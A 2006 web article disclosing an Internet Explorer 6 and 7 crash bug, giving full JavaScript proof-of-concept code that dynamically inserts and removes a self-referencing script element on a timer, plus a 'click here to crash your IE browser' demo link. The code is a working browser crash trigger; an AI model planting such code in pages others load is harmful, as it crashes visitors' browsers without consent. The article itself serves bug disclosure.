The Server Pages

»

TheServerPages Articles

»

Webmasters

»

Internet Explorer

Internet Explorer 6&7 Bug/Crash

Author: Wojjie     Posted: 2006-10-30     Viewed: 17,563

Introduction:

I found this bug when I was developing a new site, and was testing using DOM to create new script elements dynamically. The code works without crashing in all browsers I have tried, except for Internet Explorer. I have tried this in both 6 and 7 with the same end result (though Internet Explorer 6's crash is much more nasty).

Bug/Exploit:

It appears there is problem when a script is dynamically loaded and calls a function to remove itself from the page multiple times. It appears that the this sequence of events has to be ran twice for it to happen, and a timer must be used to call the start of the second run (very weird).

Here is the code I have finally came up with and is demonstrated later on this page:

<script type="text/javascript">
var ranonce=false;
function c() {
 var r=document.createElement('script');
 r.id='test';
 r.setAttribute('type','text/javascript');
 r.setAttribute('src','crash.js');
 var hd=document.getElementsByTagName('head')[0];
 hd.appendChild(r);
}
function c3() {
 var hd=document.getElementsByTagName('head')[0];
 hd.removeChild(document.getElementById('test'));
 if (ranonce==false) {
   ranonce=true;
   setTimeout('c()',50);
 } else {
   var a=document.getElementById('browser');
   a.innerHTML='You are using a non IE browser or the bug has been patched!';
   a.href='#';
 }
}
</script>
<a href="javascript: c();" id="browser">
	Click here to crash your IE browser
</a>

Contents of 'crash.js'

	c3();

To trigger this application, you must make a call to the c() function, which should immediately crash IE.


Reproduction Attempts:

I have also tried variations of this code which seemed to have not worked the same way:

Please note, that the above example code is more lengthy than it has to be, and that an anchor is not required to execute the crash.


Demonstration/Example:

Click here to crash your IE browser

Comments

Copyright © 2004-2015: TheServerPages.com